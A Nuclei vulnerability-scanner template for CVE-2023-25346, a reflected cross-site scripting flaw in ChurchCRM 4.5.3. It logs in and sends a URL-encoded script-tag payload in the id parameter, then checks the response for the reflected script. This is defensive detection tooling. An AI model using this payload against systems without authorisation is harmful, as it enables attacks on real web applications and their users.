nuclei-templates/http/cves/2023/CVE-2023-25346.yaml

53 lines
1.8 KiB
YAML

id: CVE-2023-25346
info:
name: ChurchCRM 4.5.3 - Cross-Site Scripting
author: Harsh
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.
remediation: |
Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability.
reference:
- https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346
- https://nvd.nist.gov/vuln/detail/CVE-2023-25346
- https://github.com/ChurchCRM/CRM
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-25346
cwe-id: CWE-79
epss-score: 0.00089
epss-percentile: 0.37238
cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: churchcrm
product: churchcrm
tags: cve,cve2023,churchcrm,xss,authenticated
http:
- raw:
- |
POST /session/begin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User={{username}}&Password={{password}}
- |
GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "ChurchCRM")'
condition: and
# digest: 4a0a00473045022078b88d59c6662e054e9f08b142f305d6530bee796d413c9c7adbe011efee0853022100a6b915b093b0add91d057d6d2b77bf5bb15d680370c135524d0fdf30c042c51e:922c64590222798bb761d5b6d8e72950